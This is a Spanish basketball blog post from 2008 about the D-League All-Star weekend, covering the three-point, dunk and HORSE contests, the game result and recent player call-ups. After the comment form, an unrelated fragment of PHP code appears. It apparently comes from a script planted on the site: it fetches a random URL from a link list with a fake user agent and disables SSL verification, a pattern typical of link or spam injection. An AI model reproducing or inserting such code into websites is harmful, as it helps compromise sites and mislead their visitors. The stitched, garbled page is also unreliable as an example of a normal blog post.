El ‘otro’ All-Star

20 de February de 2008 por txusma

Seguramente estáis cansados de recibir información sobre el All-Star Game de la NBA (aunque no a través de este blog) pero lo que tal vez no sabéis es que este fin de semana también se ha llevado a cabo el All-Star de la D-League. En él ha habido 3 concursos (mates, triples y HORSE) y el partido del que ya os adelantamos los equipos.

En el típico concurso de triples al que estamos acostumbrados se disponen sobre la línea de triple 5 carros con 5 balones cada uno. Para el concurso de la D-League se decidió utilizar 7 carros con 3 balones cada uno (2 normales y uno tricolor) de manera que se hacía más importante la transición entre carros. El concurso lo ganó Adam Harrington de Tulsa, líder en porcentaje de tiros de 3, superando en la final a Kaniel Dickens de Colorado, líder en tiros anotados.

Por lo que respecta al concurso de mates, los 4 participantes demostraron que no tienen nada que envidiar a las estrellas de la NBA en este aspecto. En la primera ronda cada jugador tenía asignado un niño al que le presentaba 2 posibles mates a hacer. El niño escogía y el jugador mataba. De esta manera cada jugador realizó 2 mates, computando la puntuación total. La final enfrentó a Mike Taylor, de sólo 1,88 m, y a Brent Petway, que finalmente se llevó la victoria.

En el concurso que no se puede ver en el All-Star de la NBA, el HORSE, el vencedor fue Lance Allred superando en la final al NBA Morris Almond. En este juego uno de los participantes intenta un tiro desde una posición del campo y de una forma determinada (por ejemplo sentado, de cuclillas o de rodillas). Si la acierta el otro deberá hacer lo mismo y en caso de errar se apuntará una letra. Pierde el primero que forme la palabra HORSE o el que más letras lleve después de un determinado tiempo. Aunque los jugadores llevaban micrófonos para poder escuchar los nombres que se inventan de los tiros y los comentarios que hacían, el espectáculo fue bastante aburrido y ha de mejorar mucho si se quiere mantener en el futuro.

Y, finalmente, el partido de las estrellas dejó el MVP de Jeremy Richardson. En la D-League este partido significó otra oportunidad más para darse a conocer y ganarse un contrato en la NBA, de manera que se jugó con tensión (no como otros). El equipo azul (con Almond, Fesenko, Richardson, Mahinmi, etc…) venció por 117 a 99 a un equipo rojo (Livingstone, Allred, Gill, etc…) que nunca estuvo cerca de llevarse la victoria.

Desde el 6 de febrero (fecha de nuestro anterior post sobre la D-League), Mickael Gelebale ha vuelto a los Sonics, Nick Fazekas ha vuelto a Dallas (y ya ha sido despedido) , Coby Karl ha ido y venido de los Lakers y Chris Richard vuelve a jugar con los Minnessota Timberwolves. Además Jeremy Richardson ha firmado un contrato de 10 días con los Atlanta Hawks.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>